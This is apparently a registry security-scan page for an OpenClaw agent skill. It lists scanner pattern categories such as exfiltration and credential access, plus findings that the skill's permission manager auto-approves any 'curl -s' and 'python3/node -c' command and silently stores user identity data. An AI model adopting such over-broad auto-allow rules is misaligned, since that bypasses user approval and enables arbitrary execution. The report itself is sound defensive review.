ClawHub

Bw Openclaw Boost

Security checks across malware telemetry and agentic risk

Overview

This is mostly a local OpenClaw productivity skill, but its permission manager can mark risky command execution patterns as safe.

Review this before installing if you plan to wire its permission checker into OpenClaw. The memory and logging features are local and coherent, but avoid storing secrets in the memory folder. The main issue is the permission manager: its defaults should be tightened before relying on it to auto-approve commands.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
Findings (6)

Intent-Code Divergence

Medium
Confidence
97% confidence
Finding
The rule labeled as a read-only Curl request allows any command beginning with `curl -s`, which still permits state-changing options such as `-X POST`, `-T`, authentication headers, or request bodies. Because this permission manager uses that pattern to auto-allow execution, an agent could perform unintended network mutations without prompting the user.

Intent-Code Divergence

High
Confidence
99% confidence
Finding
The rule marks `python3|node (-c|-m)` invocations as safe, but those forms execute arbitrary code supplied on the command line or via modules. In a permission-bypass context, this effectively grants unrestricted command execution under an auto-allow rule, defeating the purpose of fine-grained approval.

Missing User Warnings

Medium
Confidence
84% confidence
Finding
The tool persists extracted log content into long-term memory files automatically, but provides no consent gate, warning, review step, or policy checks around what is being stored. Because logs may contain sensitive user data, secrets, or transient context, silent persistence increases the risk of unintended retention and later disclosure or misuse.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The code retrieves full memory file contents and formats them for direct injection into agent context, which can expose stored personal, project, or sensitive operational data without any consent, minimization, or disclosure boundary. In this skill, the danger is elevated because the stated purpose is automatic context injection at session start, making unintended over-sharing of historical memory data likely rather than hypothetical.

Ssd 3

Medium
Confidence
89% confidence
Finding
The skill is explicitly designed to collect information from short-term logs and merge it into persistent memory categories, including user-related data. In an agent context, this creates a privacy and data-retention risk because information that was originally ephemeral may be retained indefinitely and reused outside the user's expectations.

Ssd 3

High
Confidence
97% confidence
Finding
This rule specifically matches phrases about users, roles, identity, or self-description and stores them in a long-term identity file. That is a concrete mechanism for persistent profiling of user identity data, which is especially risky if logs contain sensitive personal attributes, account details, or statements not meant for durable storage.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal